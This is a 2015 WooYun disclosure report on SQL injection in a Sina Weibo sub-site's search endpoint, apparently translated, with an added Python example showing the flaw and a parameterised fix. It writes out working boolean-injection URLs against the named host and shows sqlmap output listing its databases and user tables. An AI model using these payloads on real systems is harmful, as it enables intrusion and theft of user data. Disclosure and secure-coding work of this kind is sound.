Vulnerability summary

Defect ID: wooyun-2015-0149138

Title: SQL injection in a Sina Weibo sub-site (460,000+ user records exposed)

Vendor: Sina

Author: 路人甲

Submitted: 2015-10-24 14:36

Fixed: 2015-12-09 09:44

Published: 2015-12-09 09:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2015-10-24: Details sent to the vendor, awaiting vendor processing
2015-10-25: Vendor confirmed; details visible to the vendor only
2015-11-04: Details disclosed to core white hats and relevant domain experts
2015-11-14: Details disclosed to regular white hats
2015-11-24: Details disclosed to intern white hats
2015-12-09: Details disclosed to the public

Brief description:

With that many users, can this get a high severity rating?

Detailed description:

A search page:

http://daren.sc.weibo.com/h5/front/search


[Screenshot: QQ20151024-2@2x.png]

[Screenshot: QQ20151024-3@2x.png]


The search request with AND 1=1 appended to the val parameter:

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


[Screenshot: QQ20151024-0@2x.png]

The same request with AND 1=2:

http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522


[Screenshot: QQ20151024-1@2x.png]

Proof of vulnerability:

[Screenshot: QQ20151024-4@2x.png]
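The two requests above form a boolean oracle: the val parameter decodes to 1%' AND 1=1 AND '%'=' and 1%' AND 1=2 AND '%'=', which only differ in the result set if the value is being spliced into a LIKE pattern as SQL text. The following Python script is an added example (not part of the original report and not the site's code) that reconstructs this mechanism against an in-memory SQLite table with constructed rows, shows the oracle disappearing once the input is bound as a parameter with LIKE metacharacters escaped, and decodes the val parameter with the same percent-decoding a server applies. The URL host, table contents and the exact shape of the original query are assumptions.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample URLs following the shape of the report's requests;
# the host is a placeholder, not the affected site.
TRUE_URL = ("http://search.example/aj/h5/front/search?type=p"
            "&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0")
FALSE_URL = ("http://search.example/aj/h5/front/search?type=p"
             "&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0")


def decode_val(url):
    """Return the percent-decoded `val` query parameter, as the server sees it."""
    return parse_qs(urlsplit(url).query)["val"][0]


def build_db():
    """In-memory `user` table with constructed rows; not data from the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO user (name) VALUES (?)",
                     [("seller1",), ("bob",), ("shop10",)])
    return conn


def search_vulnerable(conn, val):
    """Assumed shape of the original query: input concatenated into a LIKE pattern.

    With val = "1%' AND 1=1 AND '%'='" the statement becomes
        ... WHERE name LIKE '%1%' AND 1=1 AND '%'='%' ...
    so the injected condition is evaluated as SQL.
    """
    sql = "SELECT name FROM user WHERE name LIKE '%" + val + "%' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, val):
    """Hardened version: val is bound as a parameter and LIKE wildcards are escaped."""
    escaped = (val.replace("\\", "\\\\")
                  .replace("%", "\\%")
                  .replace("_", "\\_"))
    sql = "SELECT name FROM user WHERE name LIKE ? ESCAPE '\\' ORDER BY name"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def boolean_oracle_present(search, conn, true_val, false_val):
    """True when a tautology and a contradiction yield different result sets,
    i.e. the input is interpreted as SQL (the check the report performs)."""
    return search(conn, true_val) != search(conn, false_val)


if __name__ == "__main__":
    conn = build_db()
    t, f = decode_val(TRUE_URL), decode_val(FALSE_URL)
    print("decoded val:", t)
    print("vulnerable:", search_vulnerable(conn, t), search_vulnerable(conn, f),
          "oracle:", boolean_oracle_present(search_vulnerable, conn, t, f))
    print("safe:      ", search_safe(conn, t), search_safe(conn, f),
          "oracle:", boolean_oracle_present(search_safe, conn, t, f))
```

The 1=1 variant returns the rows whose name contains "1" and the 1=2 variant returns nothing under concatenation, which is exactly the difference the screenshots show; with the bound parameter both payloads are treated as a literal search string and return the same (empty) result, so there is nothing for a tool such as sqlmap to infer from. Escaping % and _ matters separately from parameterisation: without it a user-supplied % still widens the match even though it can no longer alter the query structure.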


available databases [3]:
[*] darentong
[*] information_schema
[*] test
[12:09:26] [INFO] fetched data logged to text files under '/Users/.sqlmap/output/daren.sc.weibo.com'


Database: darentong
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| daren_goods | 1610535 |
| `user` | 463933 |
| activity_user | 357809 |
| sku | 217527 |
| sku_value | 138078 |
| daren | 61920 |
| goods | 55510 |
| sku_attr | 45776 |
| `order` | 18762 |
| apply_settle | 11800 |
| cash | 10233 |
| pay_notify_order | 6929 |
| income | 5332 |
| pay_notify_payment_info | 4567 |
| goods_group | 4051 |
| pay_trade_info | 3250 |
| pay_dis_application | 2375 |
| pay_trade_account | 2250 |
| merchant | 1890 |
| crm_top_apply | 1757 |
| crm_merchant | 1576 |
| crm_account | 1529 |
| classification | 1353 |
| category_goods | 1223 |
| category_merchant | 579 |
| adtask | 307 |
| crm_user | 259 |
| refund | 191 |
| pay_re_application | 111 |
| pay_re_plan | 110 |
| crm_agent_apply | 81 |
| operator | 34 |
| express | 23 |
| refund_reason | 18 |
| kv | 8 |
| category | 6 |
| address | 4 |
| pay_merchant_pay_info | 2 |
+-------------------------+---------+

Suggested fix:

Give it a high severity rating!!!

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-10-25 09:42

Vendor reply:

Vulnerability confirmed, thank you for your support.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-10-24 15:38 | 4fun (Passerby | Rank: 10 | Vulnerabilities: 1 | 很无语啊)

    What counts as a "sub-site"?